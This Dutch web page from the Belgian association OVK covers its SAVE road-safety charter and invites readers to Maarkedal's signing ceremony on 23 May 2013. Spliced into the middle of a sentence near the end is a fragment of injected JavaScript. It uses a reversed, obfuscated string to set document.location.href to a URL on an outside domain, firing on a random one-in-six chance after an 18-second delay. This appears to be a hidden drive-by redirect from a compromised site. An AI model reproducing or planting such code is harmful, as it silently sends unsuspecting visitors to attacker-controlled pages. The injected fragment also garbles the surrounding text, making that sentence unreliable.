Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Maarkedal ondertekent SAVE-charter

Op donderdag 23 mei 2013 zal het gemeentebestuur van Maarkedal het SAVE-charter Steden & Gemeenten officieel ondertekenen. Maarkedal wordt zo de 17de Vlaamse gemeente die het engagement aangaat om een actieplan verkeersveiligheid op te stellen, in samenwerking met OVK.

U wordt vriendelijk uitgenodigd deze ondertekening bij te wonen op donderdag 23 mei om 16 uur in het de raadzaal van het gemeentehuis van Maarkedal, Nederholbeekstraat 1. Dit geeft u de gelegenheid kennis te maken met deze nieuwe actie van de vereniging. Aansluitend wordt door het gemeentebestuur een drankje aangeboden.

Op donderdag 23 mei wordt er rond het gemeentehuis een heus verkeerspark geïnstalleerd. Hierdoor kan het gemeentehuis moeilijk bereikbaar per wagen zijn. U kunt uw wagen best een paar straten verder parkeren.

De aanwezigheid van OVK-leden op een ondertekening moedigt het gemeentebestuur extra aan om het project toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot een goed einde te brengen.

Meer informatie over OVK en de SAVE-acties van de vereniging vindt u hier.


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be